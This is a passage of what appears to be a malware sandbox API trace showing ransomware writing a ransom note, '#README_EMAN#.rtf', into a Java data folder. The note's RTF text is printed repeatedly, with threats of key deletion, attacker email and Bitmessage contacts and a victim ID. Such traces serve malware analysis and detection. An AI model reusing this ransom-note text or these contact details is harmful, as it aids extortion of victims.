l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0220.698] WriteFile (in: hFile=0x2f4, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0220.699] CloseHandle (hObject=0x2f4) returned 1 [0220.699] GetFileAttributesW (lpFileName="C:\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\oracle\\java\\.oracle_jre_usage\\#readme_eman#.rtf")) returned 0xffffffff [0220.699] GetLastError () returned 0x2 [0220.700] CreateFileW (lpFileName="C:\\ProgramData\\Oracle\\Java\\.oracle_jre_usage\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\oracle\\java\\.oracle_jre_usage\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f4 [0220.700] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0220.700] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0220.700] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 